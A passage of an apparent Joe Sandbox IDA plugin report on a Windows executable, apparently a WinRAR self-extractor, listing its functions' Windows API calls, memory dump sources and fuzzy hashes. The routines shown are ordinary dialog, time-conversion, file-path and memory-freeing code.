                                                                                                                                                        • Part of subcall function 00A21E44: SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A40720
                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000001,00010447), ref: 00A40747
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,16050E2A), ref: 00A40760
                                                                                                                                                      • GetDlgItem.USER32(?,00000065), ref: 00A4077C
                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A40790
                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A407A6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Item$DialogTextWindow
                                                                                                                                                      • String ID: LICENSEDLG
                                                                                                                                                      • API String ID: 3077722735-2177901306
                                                                                                                                                      • Opcode ID: ed3904f2e11737bbdc76916d14e1f3ac2e3932bc7dd89749a80ee852eeda8d74
                                                                                                                                                      • Instruction ID: f16bbe06ace6fd4eb49dd19615136f8a6ad2d2144b9bbac1bc9b76c276cec7e2
                                                                                                                                                      • Opcode Fuzzy Hash: ed3904f2e11737bbdc76916d14e1f3ac2e3932bc7dd89749a80ee852eeda8d74
                                                                                                                                                      • Instruction Fuzzy Hash: C121F435248604BFD611DFB5DD4CEAB3B7DEB86745F014514F704A60A0DBB1AA42AB32
                                                                                                                                                      Function 00A37818 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __aulldiv.LIBCMT ref: 00A3783D
                                                                                                                                                        • Part of subcall function 00A3067E: GetVersionExW.KERNEL32(?), ref: 00A306AF
                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00A37860
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00A37872
                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A37883
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A37893
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A378A3
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00A378DE
                                                                                                                                                      • __aullrem.LIBCMT ref: 00A37984
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1247370737-0
                                                                                                                                                      • Opcode ID: 69b6f322d258243ccfd273e6eb1f3aad35df7a6655e70c6ef55640639600f5e4
                                                                                                                                                      • Instruction ID: 3667296cb29b6627f672dd50df6411e85a8350fd35c8b6293a5884ffa60cf562
                                                                                                                                                      • Opcode Fuzzy Hash: 69b6f322d258243ccfd273e6eb1f3aad35df7a6655e70c6ef55640639600f5e4
                                                                                                                                                      • Instruction Fuzzy Hash: 805137B1508305AFD750DFA5C88496BBBF9FB88714F008A2EF59AD2211E734E549CB52
                                                                                                                                                      Function 00A30E49 Relevance: 10.7, APIs: 7, Instructions: 197COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A30E50
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00A30E85
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00A30EC4
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A30ED4
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00A30F51
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00A30F93
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A30FA3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FullNamePath$_wcslen$H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 840513527-0
                                                                                                                                                      • Opcode ID: d1047505104e8f17f207c0c91e4db5d9d3843f70187bf41653b18f5c9375bc3c
                                                                                                                                                      • Instruction ID: fb034b339d465062ad72aeed038f05f08001e29bd6e74bb9460d1b93f032c2d0
                                                                                                                                                      • Opcode Fuzzy Hash: d1047505104e8f17f207c0c91e4db5d9d3843f70187bf41653b18f5c9375bc3c
                                                                                                                                                      • Instruction Fuzzy Hash: 14616A71E00208ABCB18DFA9D985EEEBBB9EF89710F14412AF410E7291DB349940CB61
                                                                                                                                                      Function 00A56239 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00A569AE,?,00000000,?,00000000,00000000), ref: 00A5627B
                                                                                                                                                      • __fassign.LIBCMT ref: 00A562F6
                                                                                                                                                      • __fassign.LIBCMT ref: 00A56311
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00A56337
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00A569AE,00000000,?,?,?,?,?,?,?,?,?,00A569AE,?), ref: 00A56356
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,00A569AE,00000000,?,?,?,?,?,?,?,?,?,00A569AE,?), ref: 00A5638F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                      • Opcode ID: 7db7d9a162335b783686bcf6f29bf3ef397b53c72f781431721f713b0dd2c020
                                                                                                                                                      • Instruction ID: a6c8b9820ff5bda0323d8d0fb5b7b366a39a75f1df67068154b4eda8b56d02ff
                                                                                                                                                      • Opcode Fuzzy Hash: 7db7d9a162335b783686bcf6f29bf3ef397b53c72f781431721f713b0dd2c020
                                                                                                                                                      • Instruction Fuzzy Hash: 7C51A371A002499FDB10CFA8DC85AEEBBF8FF49321F14411AE956EB291E7709945CB60
                                                                                                                                                      Function 00A493C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00A493F7
                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00A493FF
                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00A49488
                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00A494B3
                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00A49508
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                      • String ID: csm
                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                      • Opcode ID: 8c65cba2ac67d917b875c87f4dd146383fa848879b15443cf5e9474f51c040ae
                                                                                                                                                      • Instruction ID: 51a1c2106a32b5e942bbf640b994ad988568bcbbdd237904df91e45f37703fd4
                                                                                                                                                      • Opcode Fuzzy Hash: 8c65cba2ac67d917b875c87f4dd146383fa848879b15443cf5e9474f51c040ae
                                                                                                                                                      • Instruction Fuzzy Hash: 7F41843CA00218ABCF10DF68C885A9F7BF5BF85324F148155E8199B392D735AA16CB92
                                                                                                                                                      Function 00A3E265 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A3E26C
                                                                                                                                                      • ShowWindow.USER32(?,00000000,00000038), ref: 00A3E294
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00A3E2D8
                                                                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00A3E373
                                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00A3E394
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Show$H_prolog3_Rect
                                                                                                                                                      • String ID: RarHtmlClassName
                                                                                                                                                      • API String ID: 950582801-1658105358
                                                                                                                                                      • Opcode ID: a619037203b26f7903024678a9fa54efc1622ebacbf222e0470be5e3ef9806bf
                                                                                                                                                      • Instruction ID: d6257f0f44bbc39950df6d0617f2c0aa00f9b920d5e60c0c758f7a5912b2de0d
                                                                                                                                                      • Opcode Fuzzy Hash: a619037203b26f7903024678a9fa54efc1622ebacbf222e0470be5e3ef9806bf
                                                                                                                                                      • Instruction Fuzzy Hash: 70414771900204EFDF11DFA4DD89BAE7BB8EF48300F548169F908AB1A1DB309985CB61
                                                                                                                                                      Function 00A53554 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A53518: _free.LIBCMT ref: 00A53541
                                                                                                                                                      • _free.LIBCMT ref: 00A535A2
                                                                                                                                                        • Part of subcall function 00A503D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?), ref: 00A503EA
                                                                                                                                                        • Part of subcall function 00A503D4: GetLastError.KERNEL32(?,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?,?), ref: 00A503FC
                                                                                                                                                      • _free.LIBCMT ref: 00A535AD
                                                                                                                                                      • _free.LIBCMT ref: 00A535B8
                                                                                                                                                      • _free.LIBCMT ref: 00A5360C
                                                                                                                                                      • _free.LIBCMT ref: 00A53617
                                                                                                                                                      • _free.LIBCMT ref: 00A53622
                                                                                                                                                      • _free.LIBCMT ref: 00A5362D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                      • Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                                                                                                                      • Instruction ID: 22fe1315802efeef7a58fd5e069eda8221e95a582872caf6d5ba51485fa0aced
                                                                                                                                                      • Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                                                                                                                      • Instruction Fuzzy Hash: 26112C72540B04BBD931BBB0CD06FCB779C7F40792F401815BB9A6A052EA75A6094790
                                                                                                                                                      Function 00A44D5F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00A44DDA,00A44D3D,00A44FDE), ref: 00A44D76
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A44D8C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A44DA1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                      • API String ID: 667068680-1718035505
                                                                                                                                                      • Opcode ID: b8e27dec8f9296089ed66c3010b90ad2d5f8b9e18f762dd2d3b4cf454de42a88
                                                                                                                                                      • Instruction ID: cf1559f2cb3f8723035909467aa57128859de6126ba1b75bab9f2b374a3f4ddf
                                                                                                                                                      • Opcode Fuzzy Hash: b8e27dec8f9296089ed66c3010b90ad2d5f8b9e18f762dd2d3b4cf454de42a88
                                                                                                                                                      • Instruction Fuzzy Hash: 0AF0F679F01F22EB5B31DFF46C84776A3DCBA8D7263104939EA15D3280E660CC528690
                                                                                                                                                      Function 00A51609 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A4C5A2,00A4C5A2,?,?,?,00A5185A,00000001,00000001,C5E85006), ref: 00A51663
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A5185A,00000001,00000001,C5E85006,?,?,?), ref: 00A516E9
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A517E3
                                                                                                                                                      • __freea.LIBCMT ref: 00A517F0
                                                                                                                                                        • Part of subcall function 00A5040E: RtlAllocateHeap.NTDLL(00000000,00A4535E,?,?,00A46C16,?,?,?,?,?,00A45269,00A4535E,?,?,?,?), ref: 00A50440
                                                                                                                                                      • __freea.LIBCMT ref: 00A517F9
                                                                                                                                                      • __freea.LIBCMT ref: 00A5181E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                      • Opcode ID: 194d282eede76d43ffa3a64b9619845737e309872f4d4c052420793986758323
                                                                                                                                                      • Instruction ID: e4e9c370f877807536e9bc36686b65e165f9a6afa2217133d6f4abd452d68d1a
                                                                                                                                                      • Opcode Fuzzy Hash: 194d282eede76d43ffa3a64b9619845737e309872f4d4c052420793986758323
                                                                                                                                                      • Instruction Fuzzy Hash: BF51B272600216AFDB258F68CD81FBB77AAFB48752F194628FC04D6150EB34DC98CA90
                                                                                                                                                      Function 00A37AA3 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00A37B06
                                                                                                                                                        • Part of subcall function 00A3067E: GetVersionExW.KERNEL32(?), ref: 00A306AF
                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00A37B2A
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00A37B44
                                                                                                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00A37B57
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00A37B67
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00A37B77
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2092733347-0
                                                                                                                                                      • Opcode ID: 4ed9336822aab16427fcf4fc31d4c68c2109ea825752d207ff5fe29e48880cdf
                                                                                                                                                      • Instruction ID: f9483460c3d6425b8a681cade2cb1178bc78c884f391195df768fdf32b0e9a62
                                                                                                                                                      • Opcode Fuzzy Hash: 4ed9336822aab16427fcf4fc31d4c68c2109ea825752d207ff5fe29e48880cdf
                                                                                                                                                      • Instruction Fuzzy Hash: 8841E4761083159FC704DFA8C88499BB7F8BF98714F044A1AF99AC7211E730D949CBA6
                                                                                                                                                      Function 00A3F33B Relevance: 9.1, APIs: 6, Instructions: 102timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,5C02E116,?,?,?,?,00A5AA27,000000FF), ref: 00A3F38A
                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,00A5AA27,000000FF), ref: 00A3F399
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,00A5AA27,000000FF), ref: 00A3F3A7
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00A5AA27,000000FF), ref: 00A3F3B5
                                                                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,00A5AA27,000000FF), ref: 00A3F3D0
                                                                                                                                                      • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,00A5AA27,000000FF), ref: 00A3F3FA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$System$File$Format$DateLocalSpecific
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 909090443-0
                                                                                                                                                      • Opcode ID: b31c26bbe841da8d6e39fa4b688e1b4d7d7de0235599c05030b8f52ed0c16a83
                                                                                                                                                      • Instruction ID: 41bbc0a7110055d3d93c9fcbd375802e4a87501a3ffcd428d6b9b28905d1bf6b
                                                                                                                                                      • Opcode Fuzzy Hash: b31c26bbe841da8d6e39fa4b688e1b4d7d7de0235599c05030b8f52ed0c16a83
                                                                                                                                                      • Instruction Fuzzy Hash: F8311BB2510288AFDB21DFA4DD85EEF77ACFB59711F00422AF906D7141EB74AA05CB60
                                                                                                                                                      Function 00A4977A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(?,?,00A49771,00A496CC,00A46A64), ref: 00A49788
                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A49796
                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A497AF
                                                                                                                                                      • SetLastError.KERNEL32(00000000,00A49771,00A496CC,00A46A64), ref: 00A49801
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                      • Opcode ID: eb72265073226e2a24c1193aba293bef0ae78229f53beb37900642c803e89ad0
                                                                                                                                                      • Instruction ID: 0bb744fe980b0d46878738c1df49c2676b1e551d04d7d7615be6b68691c11b72
